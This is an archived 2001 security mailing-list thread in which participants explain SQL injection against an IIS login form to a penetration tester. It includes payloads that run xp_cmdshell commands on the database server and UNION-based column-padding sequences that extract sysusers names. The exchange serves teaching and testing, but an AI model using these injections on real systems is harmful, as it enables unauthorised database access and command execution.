RE: SQL

From: rudi carell (rudicarell@hotmail.com)
Date: 11/22/01 

From: "rudi carell" <rudicarell@hotmail.com>
To: Andy.Miller@insight.co.uk, jfernandez@germinus.com, garyo@sec-1.com, PEN-TEST@securityfocus.com
Subject: RE: SQL
Date: Thu, 22 Nov 2001 07:55:35 
Message-ID: <F231fC65FE3TiZij3Ht0000ec2e@hotmail.com>

Andrew said:
>Don't you need the returned recordset to be written to the html stream in
>order to see anything useful? For instance if you are just looking at a
>login page you may not get any joy with appending extra SELECTs? We have
>just been playing with exactly this!
>
>Andrew Miller

.. yes,

but .. the first thing is .. there is no need for html­-output when you can
execute system-commands (xp_cmdshell..,sp_adduser etc ....)

and

htmloutput can be achieved by

a) using aliases (AS)
b) brute-force the column(s) you can see within output using "UNION"

HowTo:

1)guess the number of columns from table A by Column-Padding (see example)
2)find the right column number within Query (see example)
3)if necessary typecast columns

example:

---cut here---
sequence I

[original] union select '1' from sysusers;--
[original] union select '1','1' from sysusers;--
[original] union select '1','1','1' from sysusers;--
[original] union select '1','1','1','1'from sysusers;--

after no error message
sequence II

[original] union select name,'1','1','1' from sysusers;--
[original] union select '1',name,'1','1' from sysusers;--
[original] union select '1','1',name,'1','1' from sysusers;--

.. until name appears within html .... tataa
---cut here---

nice day,

rc

security@freefly.com
http://www.freefly.com/security/

>You migh (90% chance) have a possibility to
>
>a) alter the database
>b) execute remote commands in the SQL server
>
>This is a common error (not quoting quotes :), this is due to the SQL
>statement being executed in the ISS server (through an ODBC connection)
>is just added the information given by the user.
>
>Thus:
>
>SELECT * from test where value='$user'
>
>if user=' becomes:
>
>SELECT * from test where value='''
>
>which generates your error.
>
>However, you can do the following
>if user=test'; select * from test -- becomes:
>
>SELECT * from test where value='test'; select * from test -- '
>
>which is a valid SQL statement (two as a matter of fact) and
>if user=test'; exec master..xp_cmdshell 'dir' -- becomes:
>
>SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' --
>
>
>which will run the 'dir' command in the SQL server (not in the IIS!)
>This is fun
>since, in some cases, the ISS server is in a DMZ and the SQL server is
>in the internal
>lan or through another firewall like this:
>
>Internet ----- Fw -------- Fw --------- Local network
> | |
> IIS SQL server
>
>or
>
>Internet ----- Fw -------- Local network
> | |
> IIS SQL server
>
>
>So you might be one step closer to your target !
>
>Some references (fresh out from google):
>http://www.sqlsecurity.com/faq-inj.asp
>http://www.silksoft.co.za/data/sqlinjectionattack.htm
>
> Regards
>
>
> Javier Fernández-Sanguino Peña
>
> >
> > Hello all,
> >
> >
> > I am doing a pen test against a IIS 5 web server. The web
> > server requires a
> > user name and password via a logon form. if a single quote
> > character is
> > entered (username)the following error is produced
> >
> > [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> > before the character string '' and password=''.
> >
> > I remember reading somewhere that this can be used to gain
> > further access?
> > but i cant find the info.
> >
> > Can any one help?
> >
> > Thanks in advance.
> >
> > Gary
> >
> >
> > --------------------------------------------------------------
> > --------------
> > This list is provided by the SecurityFocus Security
> > Intelligence Alert (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security
> > vulnerabilities please see:
> > https://alerts.securityfocus.com/
> >
>
>----------------------------------------------------------------------------
>This list is provided by the SecurityFocus Security Intelligence Alert
>(SIA)
>Service. For more information on SecurityFocus' SIA service which
>automatically alerts you to the latest security vulnerabilities please see:
>https://alerts.securityfocus.com/
>
>
>_____________________________________________________________________
>This message has been checked for all known viruses by bluesource. For
>further information visit www.blue-source.com
>
>powered by Messagelabs
>
>
>------------Insight Consulting Limited--------------------------------
>Insight Consulting Limited is a leading specialist provider of independent
>services in all aspects of information and communications security,
>business continuity and risk management from consultancy, implementation,
>testing and training to recruitment, research and outsourcing.
>---------------------Disclaimer----------------------------------------
>Internet communications are not secure and therefore Insight Consulting
>Limited does not accept legal responsibility for the contents of this
>message. Any views or opinions presented are solely those of the author
>and do not necessarily represent those of Insight Consulting Limited unless
>otherwise specifically stated. If this message is received by anyone other
>than the addressee, please notify the sender and then delete the message
>and any attachments from your computer.
>-----------------------------------------------------------------------
>
>----------------------------------------------------------------------------
>This list is provided by the SecurityFocus Security Intelligence Alert
>(SIA)
>Service. For more information on SecurityFocus' SIA service which
>automatically alerts you to the latest security vulnerabilities please see:
>https://alerts.securityfocus.com/
>

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Relevant Pages

  • RE: SQL Slammer doing the rounds again?
    ... SQL Slammer doing the rounds again? ... "I used to hate writing assignments, ... > Security Business Unit ... > at the largest, most highly-anticipated industry ...
    (Incidents)
  • Re: sql injection query
    ... escapes the values so this alone greatly enhances security. ... there was a post here a while ago about Validating SQL ... these regex's were very good] so he had no worries about Injection. ... wanted to know if I call a storedprocedure like this I would be similarly ...
    (microsoft.public.dotnet.framework.adonet)
  • RE: Insurance
    ... property--data beign deemed "intangible" for the purposes of insurance. ... for physical security testing there are often 3rd parties ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • [NEWS] IBM Informix Web DataBlade Vulnerable to Auto-decoding of HTML Entities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... HTML encoded strings are automatically being decoded when used in SQL ... When a string has been ... $'ed it should thus be safe to use it in an SQL query, ...
    (Securiteam)
  • Re: Microsoft Informational Alert
    ... > PSS Security Response Team Alert - SQL Security Recommendations ... > PRODUCTS AFFECTED: SQL Server ... Secure your SA login account with a non-NULL password. ...
    (microsoft.public.security)